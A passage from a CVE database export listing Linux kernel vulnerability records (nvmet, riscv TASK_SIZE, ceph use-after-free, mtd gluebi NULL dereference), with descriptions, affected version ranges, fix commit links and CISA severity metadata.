{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"name": "RHSA-2024:3810",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3810"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6536"
},
{
"name": "RHBZ#2254052",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254052"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-11T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-11T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: null pointer dereference in __nvmet_req_complete",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module nvmet-tcp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-6536",
"datePublished": "2024-02-07T21:05:13.716Z",
"dateReserved": "2023-12-05T21:00:40.604Z",
"dateUpdated": "2025-11-06T21:45:28.671Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35988 (GCVE-0-2024-35988)
Vulnerability from cvelistv5
Published
2024-05-20 09:47
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
riscv: Fix TASK_SIZE on 64-bit NOMMU
On NOMMU, userspace memory can come from anywhere in physical RAM. The
current definition of TASK_SIZE is wrong if any RAM exists above 4G,
causing spurious failures in the userspace access routines.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6bd33e1ece528f67646db33bf97406b747dafda0 Version: 6bd33e1ece528f67646db33bf97406b747dafda0 Version: 6bd33e1ece528f67646db33bf97406b747dafda0 Version: 6bd33e1ece528f67646db33bf97406b747dafda0 Version: 6bd33e1ece528f67646db33bf97406b747dafda0 Version: 6bd33e1ece528f67646db33bf97406b747dafda0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35988",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:03:33.366892Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:26.327Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.607Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04bf2e5f95c1a52e28a7567a507f926efe31c3b6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52e8a42b11078d2aad4b9ba96503d77c7299168b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4201b8c8f2c32af321fb50867e68ac6c1cbed4be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0f0dbbb1bc49fa0de18e92c36492ff6d804cdaa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/efdcfa554b6eb228943ef1dd4d023c606be647d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6065e736f82c817c9a597a31ee67f0ce4628e948"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/riscv/include/asm/pgtable.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "04bf2e5f95c1a52e28a7567a507f926efe31c3b6",
"status": "affected",
"version": "6bd33e1ece528f67646db33bf97406b747dafda0",
"versionType": "git"
},
{
"lessThan": "52e8a42b11078d2aad4b9ba96503d77c7299168b",
"status": "affected",
"version": "6bd33e1ece528f67646db33bf97406b747dafda0",
"versionType": "git"
},
{
"lessThan": "4201b8c8f2c32af321fb50867e68ac6c1cbed4be",
"status": "affected",
"version": "6bd33e1ece528f67646db33bf97406b747dafda0",
"versionType": "git"
},
{
"lessThan": "a0f0dbbb1bc49fa0de18e92c36492ff6d804cdaa",
"status": "affected",
"version": "6bd33e1ece528f67646db33bf97406b747dafda0",
"versionType": "git"
},
{
"lessThan": "efdcfa554b6eb228943ef1dd4d023c606be647d2",
"status": "affected",
"version": "6bd33e1ece528f67646db33bf97406b747dafda0",
"versionType": "git"
},
{
"lessThan": "6065e736f82c817c9a597a31ee67f0ce4628e948",
"status": "affected",
"version": "6bd33e1ece528f67646db33bf97406b747dafda0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/riscv/include/asm/pgtable.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: Fix TASK_SIZE on 64-bit NOMMU\n\nOn NOMMU, userspace memory can come from anywhere in physical RAM. The\ncurrent definition of TASK_SIZE is wrong if any RAM exists above 4G,\ncausing spurious failures in the userspace access routines."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:00.431Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/04bf2e5f95c1a52e28a7567a507f926efe31c3b6"
},
{
"url": "https://git.kernel.org/stable/c/52e8a42b11078d2aad4b9ba96503d77c7299168b"
},
{
"url": "https://git.kernel.org/stable/c/4201b8c8f2c32af321fb50867e68ac6c1cbed4be"
},
{
"url": "https://git.kernel.org/stable/c/a0f0dbbb1bc49fa0de18e92c36492ff6d804cdaa"
},
{
"url": "https://git.kernel.org/stable/c/efdcfa554b6eb228943ef1dd4d023c606be647d2"
},
{
"url": "https://git.kernel.org/stable/c/6065e736f82c817c9a597a31ee67f0ce4628e948"
}
],
"title": "riscv: Fix TASK_SIZE on 64-bit NOMMU",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35988",
"datePublished": "2024-05-20T09:47:54.391Z",
"dateReserved": "2024-05-17T13:50:33.146Z",
"dateUpdated": "2025-05-04T09:10:00.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26689 (GCVE-0-2024-26689)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ceph: prevent use-after-free in encode_cap_msg()
In fs/ceph/caps.c, in encode_cap_msg(), "use after free" error was
caught by KASAN at this line - 'ceph_buffer_get(arg->xattr_buf);'. This
implies before the refcount could be increment here, it was freed.
In same file, in "handle_cap_grant()" refcount is decremented by this
line - 'ceph_buffer_put(ci->i_xattrs.blob);'. It appears that a race
occurred and resource was freed by the latter line before the former
line could increment it.
encode_cap_msg() is called by __send_cap() and __send_cap() is called by
ceph_check_caps() after calling __prep_cap(). __prep_cap() is where
arg->xattr_buf is assigned to ci->i_xattrs.blob. This is the spot where
the refcount must be increased to prevent "use after free" error.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.664Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8180d0c27b93a6eb60da1b08ea079e3926328214"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70e329b440762390258a6fe8c0de93c9fdd56c77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f3f98d7d84b31828004545e29fd7262b9f444139"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae20db45e482303a20e56f2db667a9d9c54ac7e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7958c1bf5b03c6f1f58e724dbdec93f8f60b96fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cda4672da1c26835dcbd7aec2bfed954eda9b5ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26689",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-15T19:26:55.316031Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-15T19:27:03.603Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ceph/caps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8180d0c27b93a6eb60da1b08ea079e3926328214",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "70e329b440762390258a6fe8c0de93c9fdd56c77",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "f3f98d7d84b31828004545e29fd7262b9f444139",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "ae20db45e482303a20e56f2db667a9d9c54ac7e7",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "7958c1bf5b03c6f1f58e724dbdec93f8f60b96fc",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "cda4672da1c26835dcbd7aec2bfed954eda9b5ef",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ceph/caps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.34"
},
{
"lessThan": "2.6.34",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: prevent use-after-free in encode_cap_msg()\n\nIn fs/ceph/caps.c, in encode_cap_msg(), \"use after free\" error was\ncaught by KASAN at this line - \u0027ceph_buffer_get(arg-\u003exattr_buf);\u0027. This\nimplies before the refcount could be increment here, it was freed.\n\nIn same file, in \"handle_cap_grant()\" refcount is decremented by this\nline - \u0027ceph_buffer_put(ci-\u003ei_xattrs.blob);\u0027. It appears that a race\noccurred and resource was freed by the latter line before the former\nline could increment it.\n\nencode_cap_msg() is called by __send_cap() and __send_cap() is called by\nceph_check_caps() after calling __prep_cap(). __prep_cap() is where\narg-\u003exattr_buf is assigned to ci-\u003ei_xattrs.blob. This is the spot where\nthe refcount must be increased to prevent \"use after free\" error."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:07.429Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8180d0c27b93a6eb60da1b08ea079e3926328214"
},
{
"url": "https://git.kernel.org/stable/c/70e329b440762390258a6fe8c0de93c9fdd56c77"
},
{
"url": "https://git.kernel.org/stable/c/f3f98d7d84b31828004545e29fd7262b9f444139"
},
{
"url": "https://git.kernel.org/stable/c/ae20db45e482303a20e56f2db667a9d9c54ac7e7"
},
{
"url": "https://git.kernel.org/stable/c/7958c1bf5b03c6f1f58e724dbdec93f8f60b96fc"
},
{
"url": "https://git.kernel.org/stable/c/cda4672da1c26835dcbd7aec2bfed954eda9b5ef"
}
],
"title": "ceph: prevent use-after-free in encode_cap_msg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26689",
"datePublished": "2024-04-03T14:54:50.885Z",
"dateReserved": "2024-02-19T14:20:24.154Z",
"dateUpdated": "2025-05-04T08:54:07.429Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52449 (GCVE-0-2023-52449)
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mtd: Fix gluebi NULL pointer dereference caused by ftl notifier
If both ftl.ko and gluebi.ko are loaded, the notifier of ftl
triggers NULL pointer dereference when trying to access
‘gluebi->desc’ in gluebi_read().
ubi_gluebi_init
ubi_register_volume_notifier
ubi_enumerate_volumes
ubi_notify_all
gluebi_notify nb->notifier_call()
gluebi_create
mtd_device_register
mtd_device_parse_register
add_mtd_device
blktrans_notify_add not->add()
ftl_add_mtd tr->add_mtd()
scan_header
mtd_read
mtd_read_oob
mtd_read_oob_std
gluebi_read mtd->read()
gluebi->desc - NULL
Detailed reproduction information available at the Link [1],
In the normal case, obtain gluebi->desc in the gluebi_get_device(),
and access gluebi->desc in the gluebi_read(). However,
gluebi_get_device() is not executed in advance in the
ftl_add_mtd() process, which leads to NULL pointer dereference.
The solution for the gluebi module is to run jffs2 on the UBI
volume without considering working with ftl or mtdblock [2].
Therefore, this problem can be avoided by preventing gluebi from
creating the mtdblock device after creating mtd partition of the
type MTD_UBIVOLUME.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba Version: 2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52449",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-04T20:55:21.816899Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:07.700Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.518Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aeba358bcc8ffddf9b4a9bd0e5ec9eb338d46022"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1bf4fe14e97cda621522eb2f28b0a4e87c5b0745"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/001a3f59d8c914ef8273461d4bf495df384cc5f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8ac2537763b54d278b80b2b080e1652523c7d4c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5389407bba1eab1266c6d83e226fb0840cb98dd5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfd7c9d260dc0a3baaea05a122a19ab91e193c65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b36aaa64d58aaa2f2cbc8275e89bae76a2b6c3dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a43bdc376deab5fff1ceb93dca55bcab8dbdc1d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/mtd/mtd_blkdevs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "aeba358bcc8ffddf9b4a9bd0e5ec9eb338d46022",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "1bf4fe14e97cda621522eb2f28b0a4e87c5b0745",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "001a3f59d8c914ef8273461d4bf495df384cc5f8",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "d8ac2537763b54d278b80b2b080e1652523c7d4c",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "5389407bba1eab1266c6d83e226fb0840cb98dd5",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "cfd7c9d260dc0a3baaea05a122a19ab91e193c65",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "b36aaa64d58aaa2f2cbc8275e89bae76a2b6c3dc",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
},
{
"lessThan": "a43bdc376deab5fff1ceb93dca55bcab8dbdc1d6",
"status": "affected",
"version": "2ba3d76a1e29f2ba64fbc762875cf9fb2d4ba2ba",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/mtd/mtd_blkdevs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.31"
},
{
"lessThan": "2.6.31",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.31",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: Fix gluebi NULL pointer dereference caused by ftl notifier\n\nIf both ftl.ko and gluebi.ko are loaded, the notifier of ftl\ntriggers NULL pointer dereference when trying to access\n\u2018gluebi-\u003edesc\u2019 in gluebi_read().\n\nubi_gluebi_init\n ubi_register_volume_notifier\n ubi_enumerate_volumes\n ubi_notify_all\n gluebi_notify nb-\u003enotifier_call()\n gluebi_create\n mtd_device_register\n mtd_device_parse_register\n add_mtd_device\n blktrans_notify_add not-\u003eadd()\n ftl_add_mtd tr-\u003eadd_mtd()\n scan_header\n mtd_read\n mtd_read_oob\n mtd_read_oob_std\n gluebi_read mtd-\u003eread()\n gluebi-\u003edesc - NULL\n\nDetailed reproduction information available at the Link [1],\n\nIn the normal case, obtain gluebi-\u003edesc in the gluebi_get_device(),\nand access gluebi-\u003edesc in the gluebi_read(). However,\ngluebi_get_device() is not executed in advance in the\nftl_add_mtd() process, which leads to NULL pointer dereference.\n\nThe solution for the gluebi module is to run jffs2 on the UBI\nvolume without considering working with ftl or mtdblock [2].\nTherefore, this problem can be avoided by preventing gluebi from\ncreating the mtdblock device after creating mtd partition of the\ntype MTD_UBIVOLUME."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:46.435Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/aeba358bcc8ffddf9b4a9bd0e5ec9eb338d46022"
},
{
"url": "https://git.kernel.org/stable/c/1bf4fe14e97cda621522eb2f28b0a4e87c5b0745"
},
{
"url": "https://git.kernel.org/stable/c/001a3f59d8c914ef8273461d4bf495df384cc5f8"
},
{
"url": "https://git.kernel.org/stable/c/d8ac2537763b54d278b80b2b080e1652523c7d4c"
},
{
"url": "https://git.kernel.org/stable/c/5389407bba1eab1266c6d83e226fb0840cb98dd5"
},
{
"url": "https://git.kernel.org/stable/c/cfd7c9d260dc0a3baaea05a122a19ab91e193c65"
},
{
"url": "https://git.kernel.org/stable/c/b36aaa64d58aaa2f2cbc8275e89bae76a2b6c3dc"
},
{
"url": "https://git.kernel.org/stable/c/a43bdc376deab5fff1ceb93dca55bcab8dbdc1d6"
}
],
"title": "mtd: Fix gluebi NULL pointer dereference caused by ftl notifier",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52449",
"datePublished": "2024-02-22T16:21:40.841Z",
"dateReserved": "2024-02-20T12:30:33.292Z",
"dateUpdated": "2025-05-04T07:36:46.435Z",
"state": "PUBLISHED"
},
